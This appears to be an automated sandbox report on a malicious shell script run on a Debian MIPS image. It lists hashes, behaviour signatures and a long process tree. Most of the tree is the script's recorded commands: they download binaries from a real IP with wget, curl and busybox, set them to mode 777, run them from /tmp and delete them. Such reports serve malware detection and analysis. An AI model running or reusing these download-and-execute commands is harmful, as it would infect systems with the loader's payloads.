Analysis
-
max time kernel
71s -
max time network
73s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
28/10/2024, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
-
Size
10KB
-
MD5
c27e3dbba79b6afbd8c32c4e50cffe76
-
SHA1
b2ec5ed7bd931b3a3b970e1d5d209d031219a547
-
SHA256
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040
-
SHA512
382804bca6a3c36dfe896726e67efbf903aede59316574bba39dd8b943f31a5caefcd2d666eb0bd1513c38a33fcde0e4d9245781648860f8c077675e5206f023
-
SSDEEP
192:mhN4hJ8oKCm/mPmympmFmO/1JdUJh1s8hN4hJRJdUJhXm/mPmympmFmWo:eoKnue3kYO/Isrue3kYWo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh/tmp/13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:716
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:720
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:741
-
-
/bin/chmodchmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:747
-
-
/bin/chmodchmod 777 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF./fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:751
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:753
-
-
/bin/chmodchmod 777 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB./9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Executes dropped EXE
PID:759
-
-
/bin/rmrm 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:762
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:764
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:804
-
-
/bin/chmodchmod 777 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o./jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:807
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:808
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:810
-
-
/bin/chmodchmod 777 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey./L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:813
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:814
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:832
-
-
/bin/chmodchmod 777 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod./vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:842
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:844
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:852
-
-
/bin/chmodchmod 777 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG./5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:858
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:859
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:861
-
-
/bin/chmodchmod 777 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4./2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:864
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:865
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:867
-
-
/bin/chmodchmod 777 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq./qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:870
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:871
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:873
-
-
/bin/chmodchmod 777 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca./SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:879
-
-
/bin/chmodchmod 777 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp./ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:885
-
-
/bin/chmodchmod 777 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n./IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:891
-
-
/bin/chmodchmod 777 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL./YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:897
-
-
/bin/chmodchmod 777 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz./BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:903
-
-
/bin/chmodchmod 777 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp./ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:909
-
-
/bin/chmodchmod 777 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n./IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:915
-
-
/bin/chmodchmod 777 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL./YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:921
-
-
/bin/chmodchmod 777 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz./BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:927
-
-
/bin/chmodchmod 777 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o./jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:933
-
-
/bin/chmodchmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:939
-
-
/bin/chmodchmod 777 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF./fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:942
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:943
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:945
-
-
/bin/chmodchmod 777 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB./9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:948
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:949
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:951
-
-
/bin/chmodchmod 777 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca./SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:954
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:955
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:957
-
-
/bin/chmodchmod 777 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey./L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:960
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:961
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:963
-
-
/bin/chmodchmod 777 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod./vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:966
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:967
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:969
-
-
/bin/chmodchmod 777 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG./5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:972
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:973
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:975
-
-
/bin/chmodchmod 777 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4./2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:978
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:979
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:981
-
-
/bin/chmodchmod 777 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq./qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:984
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97